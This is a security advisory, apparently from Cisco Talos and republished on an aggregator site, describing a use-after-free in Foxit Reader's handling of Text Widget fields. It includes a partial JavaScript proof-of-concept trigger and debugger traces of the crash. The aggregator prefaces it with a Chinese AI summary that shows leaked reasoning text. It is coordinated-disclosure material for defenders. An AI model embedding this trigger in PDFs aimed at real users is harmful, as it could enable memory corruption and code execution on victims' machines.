Foxit Reader Text Widget Format Use-After-Free Vulnerability

Foxit Reader Text Widget Format Use-After-Free Vulnerability
嗯，用户让我总结一下这篇文章的内容，控制在100字以内。首先，我需要仔细阅读文章，理解其主要内容。文章讲的是Foxit Reader中的一个漏洞，具体是使用Text Widget对象时的Use-after-free漏洞。攻击者可以通过恶意PDF或网站触发这个漏洞，导致内存损坏和代码执行。接下来，我需要提取关键信息：漏洞类型、影响版本、攻击方式、CVSS评分以及修复时间。然后，我要把这些信息浓缩成简洁的句子，确保不超过100字。要注意用词准确，比如“内存损坏”和“任意代码执行”。最后，检查总结是否涵盖了所有重要点，并且语言流畅自然。这样用户就能快速了解文章的核心内容了。 </think> Foxit Reader存在一个Use-after-free漏洞，攻击者可通过恶意PDF或网站触发该漏洞，导致内存损坏并执行任意代码。该漏洞影响版本2025.2.0.33046，CVSSv3评分为8.8。 2025-12-19 00:0:1 Author: talosintelligence.com(查看原文) 阅读量:0 收藏

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader handles a Text Widget field object. A specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2025.2.0.33046

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a Text Widget object. This can be illustrated by the following proof-of-concept code:

function main() {

    app.activeDocs[0].getField('Text Field1').setFocus();  

    [..]

    app.activeDocs[0].pageNum = 3; 

    app.activeDocs[0].pageNum = 3; 
}



function delete_pages() {

    app.activeDocs[0].deletePages(); 

}

[..]

function trigger_delete() {


    getField("txt5").setAction("Format",'delete_pages();'); 

    app.activeDocs[0].getField('Radio Button0').checkThisBox(true); 

    app.activeDocs[0].getField("Radio Button0").setFocus(); 

    getField("txt5").setAction("Calculate",'main();'); 

    [...]



}

In the above code, when the page is set to 4 (index starts at 0) in the main function, the trigger_delete function is called. The trigger_delete function assigns a callback to the Format event, which is immediately triggered by a call to setFocus. Inside the callback, a call to deletePages is made, which in turn frees all objects associated with the page. The use-after-free vulnerability occurs when an object is freed by deletePages() and subsequently accessed without any validation. We can observe the following in the debugger (with PageHeap enabled):

:000> g
malloc
FoxitPDFReader!safe_vsnprintf+0x337ca7:
00007ff6`61166ec7 b948000000      mov     ecx,48h  ;<------------------(1)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cac:
00007ff6`61166ecc e87f882c00      call    FoxitPDFReader!safe_vsnprintf+0x600530 (00007ff6`6142f750)  ;<------------------(2)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x337cb1:
00007ff6`61166ed1 488985d8000000  mov     qword ptr [rbp+0D8h],rax ss:00000020`9cef8668=000001667eaaafb0
0:000> dd rax                                        ;<------------------(3)
00000166`286a2fb0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000166`286a2fc0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000166`286a2fd0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000166`286a2fe0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000166`286a2ff0  c0c0c0c0 c0c0c0c0 d0d0d0d0 d0d0d0d0
00000166`286a3000  ???????? ???????? ???????? ????????
00000166`286a3010  ???????? ???????? ???????? ????????
00000166`286a3020  ???????? ???????? ???????? ????????

The vulnerable object is created by calling a function at (2), and the size of the object is passed to the function at (1). After allocation, the vulnerable object is examined at (3).

0:000> g
free
FoxitPDFReader!safe_vsnprintf+0x33a791:
00007ff6`611699b1 488bcf          mov     rcx,rdi ; <----------------- (4)
0:000> dd rdi
00000166`286a2fb0  00000002 00000000 72e40ed0 00000166
00000166`286a2fc0  7eaaafb0 00000166 00000000 00000000
00000166`286a2fd0  17865ff0 00000166 00000000 00000001
00000166`286a2fe0  00000000 00000008 00000000 c0c0c0c0
00000166`286a2ff0  00000000 00000000 d0d0d0d0 d0d0d0d0
00000166`286a3000  ???????? ???????? ???????? ????????
00000166`286a3010  ???????? ???????? ???????? ????????
00000166`286a3020  ???????? ???????? ???????? ????????
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a794:
00007ff6`611699b4 e8775e2c00      call    FoxitPDFReader!safe_vsnprintf+0x600610 (00007ff6`6142f830) ; <----------------- (5)
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a799:
00007ff6`611699b9 49c7042400000000 mov     qword ptr [r12],0 ds:00000020`9cefac38=00000166286a2fb0
0:000> dd 00000166286a2fb0   ; <----------------- (6)
00000166`286a2fb0  ???????? ???????? ???????? ????????
00000166`286a2fc0  ???????? ???????? ???????? ????????
00000166`286a2fd0  ???????? ???????? ???????? ????????
00000166`286a2fe0  ???????? ???????? ???????? ????????
00000166`286a2ff0  ???????? ???????? ???????? ????????
00000166`286a3000  ???????? ???????? ???????? ????????
00000166`286a3010  ???????? ???????? ???????? ????????
00000166`286a3020  ???????? ???????? ???????? ????????
0:000> p
FoxitPDFReader!safe_vsnprintf+0x33a7a1:
00007ff6`611699c1 41c6859100000001 mov     byte ptr [r13+91h],1 ds:00000166`72e40f61=01

Later, when the JavaScript API deletePages() is called, it frees all the objects associated with the page. It invokes CPDF_InterForm::DeleteField, which frees the vulnerable object. The register rdi at (4) contains the vulnerable object. The method called at (5) frees the object, and the content of the object is examined at (6) after the free operation.

The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> g
(19d0.1904): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FoxitPDFReader!safe_vsnprintf+0x34d4c6:
00007ff6`6117c6e6 4c8b4108        mov     r8,qword ptr [rcx+8] ds:00000166`286a2fb8=???????????????? ;<------------------ (7)
0:000> u
FoxitPDFReader!safe_vsnprintf+0x34d4c6:
00007ff6`6117c6e6 4c8b4108        mov     r8,qword ptr [rcx+8]
00007ff6`6117c6ea 488bda          mov     rbx,rdx
00007ff6`6117c6ed 488b5110        mov     rdx,qword ptr [rcx+10h]
00007ff6`6117c6f1 488bcb          mov     rcx,rbx
00007ff6`6117c6f4 e827b5ffff      call    FoxitPDFReader!safe_vsnprintf+0x348a00 (00007ff6`61177c20)
00007ff6`6117c6f9 488bc3          mov     rax,rbx
00007ff6`6117c6fc 4883c430        add     rsp,30h
00007ff6`6117c700 5b              pop     rbx
0:000> dd rcx
00000166`286a2fb0  ???????? ???????? ???????? ????????
00000166`286a2fc0  ???????? ???????? ???????? ????????
00000166`286a2fd0  ???????? ???????? ???????? ????????
00000166`286a2fe0  ???????? ???????? ???????? ????????
00000166`286a2ff0  ???????? ???????? ???????? ????????
00000166`286a3000  ???????? ???????? ???????? ????????
00000166`286a3010  ???????? ???????? ???????? ????????
00000166`286a3020  ???????? ???????? ???????? ????????
0:000> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff6`624da5b8     : 00000000`00000000 00000166`170fcfb0 00000166`7307ef50 00007ff6`6117d0f1 : FoxitPDFReader!safe_vsnprintf+0x34d4c6
01 00007ff6`60ddca2d     : 00000166`00000000 00000000`00000002 00000166`191ecfb0 00000020`9cefbe69 : FoxitPDFReader!safe_vsnprintf+0x16ab398
02 00007ff6`60dcffc8     : 00000166`286a2f01 00000166`ffffffff 00000166`286a2fb0 00000166`286a2fb0 : FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0xf3c4d
03 00007ff6`6117aff6     : 00007ff6`66444cc4 00000000`00000001 00000020`9cefbf80 00000166`171f3fe0 : FoxitPDFReader!std::basic_streambuf<char,std::char_traits<char> >::pubimbue+0xe71e8
04 00007ff6`625682d6     : 00000166`286a2fb0 00000000`00000000 00000166`00000000 00007ff6`624c0a01 : FoxitPDFReader!safe_vsnprintf+0x34bdd6
05 00007ff6`625410e3     : 00000166`03f70f01 00000000`00000000 00000166`26510ff0 00000166`26510ff0 : FoxitPDFReader!safe_vsnprintf+0x17390b6
06 00007ff6`62a24d79     : 00000166`03ce6ff0 00000020`9cefc190 00000166`26510ff0 00000166`03f70fe0 : FoxitPDFReader!safe_vsnprintf+0x1711ec3
07 00007ff6`62faab76     : 00000166`18a001a8 00000020`9cefc100 00000233`001b832d 00000020`9cefc1f8 : FoxitPDFReader!FXJSE_GetClass+0x3d9
08 00007ff6`62fa8e31     : 00000233`000a033d 00000166`2d704000 00000233`001801a1 00000233`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3074b6
09 00007ff6`62fa8e31     : 00000233`001d160d 00000233`001f01a1 00000233`001f01e1 00000233`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
0a 00007ff6`62fa6560     : 00000233`001d160d 00000233`00000775 00000233`001f01a1 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
0b 00007ff6`62fa60b7     : 00000020`9cefdcd8 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302ea0
0c 00007ff6`62a7b08f     : 00000020`9cefc5bc 00000020`9cefc4a9 00000020`9cefc628 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3029f7
0d 00007ff6`62a7ab34     : 00000020`9cefc628 00000166`2d704000 00000233`001e0005 00000166`2d70d110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf
0e 00007ff6`62a5aa2b     : 00000166`2d7042b0 00000020`9cefc6d0 00000166`2d756a50 00000166`18a00100 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474
0f 00007ff6`62a5a791     : 00000166`18a00130 00000166`18a000f8 00000166`2d704000 00000166`46af4fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b
10 00007ff6`62a22756     : 00000166`737e6ff0 00000166`18a00130 00000166`18a000f8 00000166`737e6ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1
11 00007ff6`62a2369b     : 00000166`18a00130 00000166`737e6ff0 00000166`11687ea0 00000166`18a00100 : FoxitPDFReader!FXJSE_Runtime_Release+0x1126
12 00007ff6`624d9bed     : 00000000`00000000 00000166`0bff3fb8 00000166`0bff3fb8 00000166`0bff3fb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b
13 00007ff6`624c2349     : 00000166`00000009 00000000`00000002 00000020`9cefca90 00000020`9cefca28 : FoxitPDFReader!safe_vsnprintf+0x16aa9cd
14 00007ff6`6012d596     : 00007ff6`624c2220 00000020`9cefca90 00000166`19a99ba0 00000166`7cb83f20 : FoxitPDFReader!safe_vsnprintf+0x1693129
15 00007ff6`6012c328     : 00000166`19a9bff0 00000166`19a9bff0 00000166`19a99ba0 00000000`00000000 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a7f46
16 00007ff6`6012b3ff     : 00000166`275a2f90 00000166`19a9bff0 00000000`0000000a 00000166`7706afd0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a6cd8
17 00007ff6`5fa3ec00     : 00000166`275a2f90 00000166`275a2f90 00000166`7706afd0 00007ff6`6012b320 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a5daf
18 00007ff6`5fa48a8a     : 00000166`23623ff0 00000166`1199dfb0 00000166`265cbfc0 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x806f0
19 00007ff6`5fa48907     : 00000166`19a9bff0 00000000`00000003 00000020`9cefcd90 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x8a57a
1a 00007ff6`5fa48679     : 00007ff6`5fa48670 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x8a3f7
1b 00007ff6`645935a2     : 00000000`00000032 00007ff6`6459d1e7 00000000`00000096 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x8a169
1c 00007ff6`64594aaf     : 00000166`10405a20 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18efee2
1d 00007ff6`6458d9d4     : 00000000`00000000 00000166`51fa2eb8 00000000`00000000 00000000`00000432 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18f13ef
1e 00007ff6`6458e494     : 00000000`00000432 00000000`000406de 00000000`00000000 00000000`00000418 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18ea314
1f 00007ffd`3188ef5c     : 00000000`00000001 00000000`00000003 00000000`000406de 00000000`000406de : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18eadd4
20 00007ffd`3188e684     : 00000000`00000000 00007ff6`6458e440 00000020`9cc32800 00000166`4f793a80 : USER32!UserCallWinProcCheckWow+0x50c
21 00007ff6`60309004     : 00007ff6`6458e440 00000000`00000ba4 00000000`00000033 00000000`00000000 : USER32!DispatchMessageWorker+0x494
22 00007ff6`625dd404     : 00000166`086a4ff0 00000166`0bc30ff0 00000166`7cc7bd60 00007ff6`624c1c5f : FoxitPDFReader!CryptUIWizExport+0x21e94
23 00007ff6`625849da     : 00000166`2b4a4fe0 00000000`00000000 00000020`9cefd2d0 00000166`7cc7bd60 : FoxitPDFReader!safe_vsnprintf+0x17ae1e4
24 00007ff6`62a251c4     : 00000166`2d704000 00000166`0bc30ff0 00000166`0abe2ff0 00000166`2b4a4fe0 : FoxitPDFReader!safe_vsnprintf+0x17557ba
25 00007ff6`62abe2b2     : 00000166`18a000e8 00000020`9cefdba8 00000020`9cefd320 00000020`9cefdb88 : FoxitPDFReader!FXJSE_GetClass+0x824
26 00007ff6`62ad6492     : 00000166`18a02000 00000020`9cefd539 00000020`9cefdb90 00000166`18a000e8 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x98bf2
27 00007ff6`62ad616d     : 00000020`9cefdba8 00000166`18a02000 00000020`9cefdba8 00000166`10c92ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0dd2
28 00007ff6`62ad6b4b     : 00000166`2d704000 00000166`18a000e0 00000166`18a02000 00000166`18a000e8 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0aad
29 00007ff6`62ad60fd     : 00000020`9cefdba8 00000020`9cefd801 00000020`9cefdba8 00007ff6`5f580000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb148b
2a 00007ff6`62ad5d2d     : 00000233`0009fcdd 00000002`00098101 00000166`2d704000 00000233`001b3e75 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0a3d
2b 00007ff6`631aeac8     : 00000000`00000001 00000020`9cefdb01 00000020`9cefd970 00000000`00000044 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb066d
2c 00007ff6`631a5b6c     : 00000166`18a02000 00000166`18a02000 00000166`00000003 00007ff6`631a4020 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50b408
2d 00007ff6`63054a7e     : 00007ff6`631a5940 00000233`001d1675 00000000`00000044 00000166`18a000d0 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x5024ac
2e 00007ff6`631414ab     : 00000233`001b427d 00000233`0009fcdd 00000233`00000069 ffffffff`fffffffe : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3b13be
2f 00007ff6`62fa8e31     : 00000233`001eb625 00000233`0009ecf1 00000233`00000085 00000233`001d1675 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x49ddeb
30 00007ff6`62fa8e31     : 00000233`001d160d 00000233`001eb545 00000233`001eb595 00000233`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
31 00007ff6`62fa6560     : 00000233`001d160d 00000233`00000775 00000233`001eb545 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x305771
32 00007ff6`62fa60b7     : 00000000`00000000 00000000`00000000 00000000`00000002 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302ea0
33 00007ff6`62a7b08f     : 00000020`9cefdf9c 00000020`9cefde89 00000020`9cefe008 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3029f7
34 00007ff6`62a7ab34     : 00000020`9cefe008 00000166`2d704000 00000233`001e0005 00000166`2d70d110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf
35 00007ff6`62a5aa2b     : 00000166`2d7042b0 00000020`9cefe0b0 00000166`2d756a50 00000166`18a00020 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474
36 00007ff6`62a5a791     : 00000166`18a00050 00000166`18a00018 00000166`2d704000 00000166`46af4fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b
37 00007ff6`62a22756     : 00000166`19046ff0 00000166`18a00050 00000166`18a00018 00000166`19046ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1
38 00007ff6`62a2369b     : 00000166`18a00050 00000166`19046ff0 00000166`474ece80 00000166`18a00020 : FoxitPDFReader!FXJSE_Runtime_Release+0x1126
39 00007ff6`624d9bed     : 00000000`00000000 00000166`254dafb8 00000166`254dafb8 00000166`254dafb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b
3a 00007ff6`6012d4b5     : 00000166`00000003 00000000`00000002 00000020`9cefe480 00000020`9cefe3c0 : FoxitPDFReader!safe_vsnprintf+0x16aa9cd
3b 00007ff6`6012c063     : 00000166`19a9bff0 00000020`9cefe430 00000000`00000000 00000166`0fc50fb0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a7e65
3c 00007ff6`6012a6b6     : 00007ff6`6012a5e0 00000166`19a9bff0 00000166`6d83ed00 00000000`00000000 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a6a13
3d 00007ff6`5f7a38b9     : 00007ff6`6012a5e0 00000020`9cefe570 00000166`23673dc8 00000166`7706afd0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a5066
3e 00007ff6`5fa2dc4e     : 00000000`00000000 00000000`00020748 00000166`0fc50fb0 00000020`9cefe5b0 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x78f9
3f 00007ff6`645935a2     : 00000000`000001a9 00000000`00000001 00007ff6`5fa2dbd0 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x6f73e
40 00007ff6`64594aaf     : 00000166`2697bcb0 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18efee2
41 00007ff6`6458d9d4     : 00000000`00000000 00000166`51fa2eb8 00000000`00000000 00000000`00000429 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18f13ef
42 00007ff6`6458e494     : 00007ff6`6717d048 00000000`00020748 00000166`51fa2e78 00007ff6`64584038 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18ea314
43 00007ffd`3188ef5c     : 00000000`00000001 00000166`51fa2e20 00000000`00020748 00000000`00020748 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18eadd4
44 00007ffd`3188e684     : 00000000`00000000 00007ff6`6458e440 00000020`9cc32800 00007ff6`64585ce4 : USER32!UserCallWinProcCheckWow+0x50c
45 00007ff6`5f9ad22a     : 00007ff6`6458e440 00000166`7689f600 00000000`00000001 00007ff6`6733c190 : USER32!DispatchMessageWorker+0x494
46 00007ff6`5f9ad324     : 00000000`00000001 00007ff6`6733c190 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1593aa
47 00007ff6`64ab5df3     : 00000000`00000001 00007ff6`5f580000 00000000`00000000 00000166`4c01df7c : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1594a4
48 00007ff6`647f37ba     : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1e12733
49 00007ffd`30b27374     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1b500fa
4a 00007ffd`31ddcc91     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
4b 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:000> lmDvm FoxitPDFReader
Browse full module list
start             end                 module name
00007ff6`5f580000 00007ff6`68b19000   FoxitPDFReader   (export symbols)       C:\Program Files\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe
    Loaded symbol image file: C:\Program Files\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe
    Image path: C:\Program Files\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe
    Image name: FoxitPDFReader.exe
    Browse all global symbols  functions  data  Symbol Reload
    Timestamp:        Sat Aug  9 08:45:03 2025 (68976CFF)
    CheckSum:         094A2639
    ImageSize:        09599000
    File version:     2025.2.0.33046
    Product version:  2025.2.0.33046
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0000.04b0
    Information from resource tables:
        CompanyName:      Foxit Software Inc.
        ProductName:      Foxit PDF Reader
        InternalName:     Foxit Reader.exe
        OriginalFilename: FoxitPDFReader.EXE
        ProductVersion:   2025.2.0.33046
        FileVersion:      2025.2.0.33046
        PrivateBuild:     
        SpecialBuild:     
        FileDescription:  Foxit PDF Reader
        LegalCopyright:   Copyright © 2004-2025 Foxit Software Inc. All Rights Reserved. 
        LegalTrademarks:  
        Comments:

The crash occurs at (7) when the object is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could ultimately be exploited to achieve arbitrary code execution.

TIMELINE

2025-10-06 - Vendor Disclosure
2025-12-19 - Vendor Patch Release
2025-12-19 - Public Release

Discovered by KPC of Cisco Talos.

文章来源: https://talosintelligence.com/vulnerability_reports/TALOS-2025-2278
如有侵权请联系:admin#unsafe.sh